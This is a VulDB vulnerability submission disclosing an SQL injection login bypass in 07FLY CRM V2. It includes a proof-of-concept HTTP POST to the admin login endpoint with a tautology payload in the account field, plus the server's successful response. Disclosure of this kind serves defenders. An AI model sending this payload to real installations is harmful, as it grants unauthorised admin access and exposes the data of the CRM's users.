Submit #205839: An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login pageinfo

TitelAn SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login page
Beschreibung07FLY CRM V2 在登录管理员登录页面时被发现容易受到通过 SQL 注入进行身份验证绕过的攻击。攻击可以远程发起。 07FLY CRM官方网站:https://gitee.com/07fly/FLY-CRM # An SQL Injection vulnerability exists in 07FLY CRM V2 via a POST request to the login # Description 07FLY CRM was found vulnerable to authentication bypass via SQL injection when logging into the administrator login page. The attack can be initiated remotely. # Vulnerability Type SQL Inject # Vendor of Product 07FLY CRM v2 # Affected Product Code Base https://gitee.com/07fly/FLY-CRM # Attack Type Remote # Proof of Concept ``` Request: POST /index.php/sysmanage/Login/login_auth/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Referer: http://www.fly.net/ Content-Length: 79 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: www.fly.net Connection: Keep-alive account=-1'%20OR%203*2*1=6%20AND%20000189=000189%20or%20'QMZIxlBw'='&password=1 ``` ``` HTTP/1.1 200 OK Server: nginx/1.15.11 Date: Sat, 09 Sep 2023 12:14:46 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive X-Powered-By: PHP/5.4.45 Set-Cookie: PHPSESSID=nj2a14ltn5cfgsomfr4iq6ss83; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 126 {"statusCode":"200","message":"\/index.php\/sysmanage\/Index\/","navTabId":"","rel":"1","callbackType":"","forwardUrl":""} ```
Quelle⚠️ https://github.com/chosir/exp/tree/main
Benutzer
 alice2014 (UID 54262)
Einreichung09.09.2023 15:29 (vor 3 Jahren)
Moderieren16.09.2023 09:15 (7 days later)
StatusAkzeptiert
VulDB Eintrag239861 [07FLY CRM V2 Administrator Login Page login_auth Konto SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!